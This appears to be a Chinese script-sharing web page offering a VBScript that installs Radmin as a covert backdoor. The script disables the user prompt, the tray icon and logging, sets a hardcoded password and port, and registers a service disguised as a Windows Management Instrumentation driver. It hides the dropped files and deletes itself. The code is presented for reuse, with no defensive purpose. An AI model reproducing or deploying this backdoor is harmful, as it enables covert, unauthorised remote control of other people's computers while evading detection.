首页脚本Vbs脚本实现radmin终极后门代码

Vbs脚本实现radmin终极后门代码

时间2024-02-11 09:59:03发布访客分类脚本浏览640
导读:收集整理的这篇文章主要介绍了Vbs脚本实现radmin终极后门代码_删除自身,觉得挺不错的,现在分享给大家,也给大家做个参考。 复制代码 代码如下:on error resume nex...
收集整理的这篇文章主要介绍了Vbs脚本实现radmin终极后门代码_删除自身,觉得挺不错的,现在分享给大家,也给大家做个参考。


复制代码 代码如下:
on error resume next 
const HKEY_LOCAL_MACHINE = & H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{ imPErsonationLevel=impersonate} !\\" & _  
strComputer &  "\root\default:StdRegPRov") 
strKeyPath = "SysTEM\RAdmin" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") 
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
ubinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) 
uBinary = Array(1,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLOG",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) 
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码 
uBinary = Array(5,4,0,0)      //端口:1029 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) 
uBinary = Array(10,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) 
Set oReg=GetObject("winmgmts:{ impersonationLevel=impersonate} !\\" & strComputer & "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
strValueName = "LogFilePath" 
strValue = "c:\logfile.txt" 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
Set oReg=GetObject("winmgmts:{ impersonationLevel=impersonate} !\\" & strComputer & "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" 
strValueName = "Description" 
strValue = "Windows media playerWindows Management Instrumentation player Drivers." 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "DisplayName" 
strValue = "Windows Management Instrumentation Player Drivers" 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "ImagePath" 
strValue = "c:\windows\system32\Exporer.exe /service" 
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("net start WinManageHelp",0) 
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) 
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) 
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除

最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)

您可能感兴趣的文章:@H_406_76@
  • 批处理程序删除自身 bat批处理
  • VBS脚本和BAT批处理删除自身的方法
  • 批处理删除自身的命令小结
  • vbs后台运行bat删除自身的代码
  • 原来ASP和PHP都是可以删除自身的
  • ASP和PHP都是可以删除自身的

声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!


若转载请注明出处: Vbs脚本实现radmin终极后门代码
本文地址: https://pptw.com/jishu/609650.html
用vbs检查注册表项的访问权限的代码 vbs病毒源文件

游客 回复需填写必要信息